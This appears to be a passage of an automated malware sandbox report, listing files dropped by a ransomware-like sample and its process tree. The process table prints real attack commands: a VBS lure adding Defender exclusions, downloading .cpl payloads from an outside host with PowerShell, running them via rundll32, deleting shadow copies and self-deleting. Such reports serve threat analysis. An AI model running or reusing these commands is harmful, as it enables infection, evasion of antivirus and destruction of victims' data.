C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\shield-preference-experiments.json.jMtw (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage.sqlite.DJrM (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\ls-archive.sqlite.rOuh (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\.metadata-v2.xXYP (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm.huxQ (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite.xBHk (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm.iHWS (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite.wVlF (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm.LPun (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite.kqQA (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm.QYzp (copy)
|
big endian ispell hash file (?),
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite.OGdw (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm.pTds (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite.qySf (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm.Ztqc (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite.zbTA (copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\targeting.snapshot.json.pzAy (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\times.json.Wmat (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite-shm.XQpa (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite.Jxjh (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default\times.json.vBOp (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\installs.ini.azAV (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini.FdKp (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\AQRFEVRTGL.png.sbdO (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\BQJUWOYRTO.jpg.IqMW (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\BUFZSQPCOH.png.NBWw (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\BWETZDQDIB.mp3.rFzU (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\GNLQNHOLWB.mp3.Lbza (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV.docx.PeLY (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV.jpg.VpGc (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV.xlsx.yYUH (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\BQJUWOYRTO.jpg.atnv (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\BUFZSQPCOH.png.tYxa (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\BWETZDQDIB.mp3.JYpC (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\HMPPSXQPQV.docx.guar (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\LHEPQPGEWF.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\LHEPQPGEWF.pdf.HYRw (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\QFAPOWPAFG.xlsx.CWZi (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\HQJBRDYKDE.png.OfAq (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH.docx.RHmK (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH.xlsx.UeMf (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\HMPPSXQPQV.xlsx.UaxH (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\HQJBRDYKDE.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\HQJBRDYKDE.png.LgrX (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\LFOPODGVOH.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\LFOPODGVOH.docx.SaHb (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\LHEPQPGEWF.mp3.XmnB (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\QFAPOWPAFG.jpg.vkDU (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\VWDFPKGDUF.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\VWDFPKGDUF.pdf.sjrJ (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LHEPQPGEWF.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\LHEPQPGEWF.jpg.YDun (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LHEPQPGEWF.mp3.LjtE (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LHEPQPGEWF.pdf
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Desktop\LHEPQPGEWF.pdf.PJxs (copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG.docx.NTIB (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG.pdf.tnWO (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\GNLQNHOLWB.mp3.oPva (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\LHEPQPGEWF.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\LHEPQPGEWF.jpg.qFLQ (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\LIJDSFKJZG.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\LIJDSFKJZG.docx.FDqX (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\PWZOQIFCAN.png.fEen (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\SNIPGPPREP.pdf.iHFW (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\VWDFPKGDUF.xlsx.bwJP (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS_1.vbs.cpHo (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWZOQIFCAN.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWZOQIFCAN.png.rzdD (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\QFAPOWPAFG.jpg.rjgv (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\QFAPOWPAFG.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\QFAPOWPAFG.xlsx.Iftn (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\SNIPGPPREP.pdf.qHBF (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV.docx.KdeN (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\HMPPSXQPQV.jpg.fPHC (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\LFOPODGVOH.xlsx.vZmS (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\LIJDSFKJZG.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\LIJDSFKJZG.pdf.vXMS (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\UNKRLCVOHV.docx.NjkO (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\VWDFPKGDUF.mp3
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\VWDFPKGDUF.mp3.DrwF (copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\Desktop\VWDFPKGDUF.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\VWDFPKGDUF.mp3.Ejpl (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\VWDFPKGDUF.pdf.ELgz (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\VWDFPKGDUF.xlsx.ujhP (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\AQRFEVRTGL.png.cYvT (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\BQJUWOYRTO.jpg.yiRS (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\BUFZSQPCOH.png.ZuiF (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\BWETZDQDIB.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\BWETZDQDIB.mp3.sITu (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\GNLQNHOLWB.mp3.ZjOU (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV.docx.Kzvg (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV.jpg.qprS (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV.xlsx.QVHr (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\BQJUWOYRTO.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\BQJUWOYRTO.jpg.enby (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\BUFZSQPCOH.png.sUKE (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\BWETZDQDIB.mp3.mMNI (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\HMPPSXQPQV.docx.zVPg (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\LHEPQPGEWF.pdf.dyuZ (copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\QFAPOWPAFG.xlsx.QUcN (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\HQJBRDYKDE.png.tTVf (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH.docx.IKPD (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH.xlsx.xWNT (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\HMPPSXQPQV.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\HMPPSXQPQV.xlsx.MJzX (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\HQJBRDYKDE.png.uXJd (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\LFOPODGVOH.docx.VqMu (copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\LHEPQPGEWF.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\LHEPQPGEWF.mp3.vYJu (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\QFAPOWPAFG.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\QFAPOWPAFG.jpg.xGvQ (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\VWDFPKGDUF.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\VWDFPKGDUF.pdf.zRdV (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LHEPQPGEWF.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\LHEPQPGEWF.jpg.CNhZ (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LHEPQPGEWF.mp3.XGOT (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LHEPQPGEWF.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\LHEPQPGEWF.pdf.IAVc (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG.docx.iDnU (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG.pdf.buHx (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\GNLQNHOLWB.mp3.xENX (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\LHEPQPGEWF.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\LHEPQPGEWF.jpg.IzkW (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\LIJDSFKJZG.docx.oCdV (copy)
|
PGP Secret Sub-key -
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\PWZOQIFCAN.png.YaBs (copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\SNIPGPPREP.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\SNIPGPPREP.pdf.YedO (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\VWDFPKGDUF.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\VWDFPKGDUF.xlsx.gEJq (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PWZOQIFCAN.png.Kkto (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\QFAPOWPAFG.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\QFAPOWPAFG.jpg.kKOY (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\QFAPOWPAFG.xlsx.mQZq (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\SNIPGPPREP.pdf.iwpd (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV.docx.cypm (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\AQRFEVRTGL.png
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\AQRFEVRTGL.png.nDFw (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\HMPPSXQPQV.jpg.isFn (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\LFOPODGVOH.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\LFOPODGVOH.xlsx.HtAb (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\LIJDSFKJZG.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\LIJDSFKJZG.pdf.xEaD (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\UNKRLCVOHV.docx.aPpg (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\VWDFPKGDUF.mp3.zWQe (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\VWDFPKGDUF.mp3.cWEJ (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\VWDFPKGDUF.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\VWDFPKGDUF.pdf.lYth (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\VWDFPKGDUF.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\VWDFPKGDUF.xlsx.gPdX (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\203bc979-cd5e-4f09-aae9-7003f9ad3c6e.tmp
|
PDF document, version 1.6 (zip deflate encoded)
|
dropped
|
||
C:\Users\user\Downloads\99044015-9ccc-4f82-9a07-de08dfe21d12.tmp
|
PDF document, version 1.6 (zip deflate encoded)
|
dropped
|
||
C:\Users\user\Downloads\AQRFEVRTGL.png
|
data
|
dropped
|
||
C:\Users\user\Downloads\AQRFEVRTGL.png.yWQt (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\BQJUWOYRTO.jpg
|
data
|
dropped
|
||
C:\Users\user\Downloads\BQJUWOYRTO.jpg.hTjf (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\BUFZSQPCOH.png.CzNe (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\BWETZDQDIB.mp3.wHns (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\GNLQNHOLWB.mp3.ybDU (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\HMPPSXQPQV.docx.efuP (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\HMPPSXQPQV.jpg.plfr (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\HMPPSXQPQV.xlsx
|
PGP Secret Sub-key -
|
dropped
|
||
C:\Users\user\Downloads\HMPPSXQPQV.xlsx.EenZ (copy)
|
PGP Secret Sub-key -
|
dropped
|
||
C:\Users\user\Downloads\HQJBRDYKDE.png.eTLY (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\LFOPODGVOH.docx.ciIl (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\LFOPODGVOH.xlsx.Rmcs (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\LHEPQPGEWF.jpg.XrhQ (copy)
|
Dyalog APL aplcore version -21.-102
|
dropped
|
||
C:\Users\user\Downloads\LHEPQPGEWF.mp3
|
data
|
dropped
|
||
C:\Users\user\Downloads\LHEPQPGEWF.mp3.gHNv (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\LHEPQPGEWF.pdf.jQaV (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\LIJDSFKJZG.docx.WyOm (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\LIJDSFKJZG.pdf
|
data
|
dropped
|
||
C:\Users\user\Downloads\LIJDSFKJZG.pdf.Ctho (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\PWZOQIFCAN.png.uFGd (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\QFAPOWPAFG.jpg.HBjx (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\QFAPOWPAFG.xlsx.agRF (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\SNIPGPPREP.pdf
|
data
|
dropped
|
||
C:\Users\user\Downloads\SNIPGPPREP.pdf.LRxo (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\UNKRLCVOHV.docx.ZgLw (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\VWDFPKGDUF.mp3.zuWD (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\VWDFPKGDUF.pdf
|
data
|
dropped
|
||
C:\Users\user\Downloads\VWDFPKGDUF.pdf.RwZL (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\VWDFPKGDUF.xlsx
|
data
|
dropped
|
||
C:\Users\user\Downloads\VWDFPKGDUF.xlsx.dRIb (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\downloaded.pdf.crdownload
|
PDF document, version 1.6 (zip deflate encoded)
|
dropped
|
||
C:\Users\user\Downloads\downloaded.pdf.iqBn (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Amazon.url.RMKT (copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Favorites\Bing.url.IcKf (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Facebook.url.kvno (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Google.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Google.url.BgnI (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Live.url.zNJf (copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Favorites\NYTimes.url.ctSi (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Reddit.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Reddit.url.VoUx (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Twitter.url.aory (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Wikipedia.url.mszi (copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Favorites\Youtube.url.mNjl (copy)
|
data
|
dropped
|
||
C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms.pLvf (copy)
|
data
|
dropped
|
||
C:\Users\user\ntuser.ini.tbeA (copy)
|
data
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
Chrome Cache Entry: 592
|
HTML document, ASCII text, with very long lines (6862)
|
downloaded
|
||
Chrome Cache Entry: 593
|
PDF document, version 1.6 (zip deflate encoded)
|
downloaded
|
||
\Device\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 825 hidden files.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS_1.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp'
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2000,i,4385509434330054281,2454780159223617298,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c control C:\Users\user~1\AppData\Local\Temp/fjeljies.cpl
|
||
C:\Windows\System32\rundll32.exe
|
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user~1\AppData\Local\Temp/fjeljies.cpl
|
||
C:\Windows\SysWOW64\rundll32.exe
|
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\Users\user~1\AppData\Local\Temp/fjeljies.cpl
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c %temp%/eryy65ty.exe
|
||
C:\Users\user\AppData\Local\Temp\eryy65ty.exe
|
C:\Users\user~1\AppData\Local\Temp/eryy65ty.exe
|
||
C:\Windows\System32\wbem\WMIC.exe
|
c:\jExFKd\jExF\..\..\Windows\jExF\jExF\..\..\system32\jExF\jExF\..\..\wbem\jExF\jExFK\..\..\wmic.exe shadowcopy delete
|
||
C:\Users\user\AppData\Local\Temp\eryy65ty.exe
|
"C:\Users\user~1\AppData\Local\Temp\eryy65ty.exe"
|
||
C:\Windows\System32\wbem\WMIC.exe
|
c:\qYxiJv\qYxi\..\..\Windows\qYxi\qYxi\..\..\system32\qYxi\qYxi\..\..\wbem\qYxi\qYxiJ\..\..\wmic.exe shadowcopy delete
|
||
C:\Users\user\AppData\Local\Temp\eryy65ty.exe
|
"C:\Users\user~1\AppData\Local\Temp\eryy65ty.exe"
|
||
C:\Windows\System32\wbem\WMIC.exe
|
c:\DgeFGH\DgeF\..\..\Windows\DgeF\DgeF\..\..\system32\DgeF\DgeF\..\..\wbem\DgeF\DgeFG\..\..\wmic.exe shadowcopy delete
|
||
C:\Windows\System32\wbem\WMIC.exe
|
c:\xMvAnp\xMvA\..\..\Windows\xMvA\xMvA\..\..\system32\xMvA\xMvA\..\..\wbem\xMvA\xMvAn\..\..\wmic.exe shadowcopy delete
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user~1\AppData\Local\Temp\eryy65ty.exe"
|
||
C:\Windows\SysWOW64\PING.EXE
|
ping 1.1.1.1 -n 1 -w 3000
|
||
C:\Windows\System32\wbem\WMIC.exe
|
c:\mCMXKV\mCMX\..\..\Windows\mCMX\mCMX\..\..\system32\mCMX\mCMX\..\..\wbem\mCMX\mCMXK\..\..\wmic.exe shadowcopy delete
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user~1\AppData\Local\Temp\eryy65ty.exe"
|
||
C:\Windows\SysWOW64\PING.EXE
|
ping 1.1.1.1 -n 1 -w 3000
|
||
C:\Windows\System32\wbem\WMIC.exe
|
c:\mZDBzN\mZDB\..\..\Windows\mZDB\mZDB\..\..\system32\mZDB\mZDB\..\..\wbem\mZDB\mZDBz\..\..\wmic.exe shadowcopy delete
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user~1\AppData\Local\Temp\eryy65ty.exe"
|
||
C:\Windows\SysWOW64\PING.EXE
|
ping 1.1.1.1 -n 1 -w 3000
|
||
C:\Windows\System32\conhost.exe
|
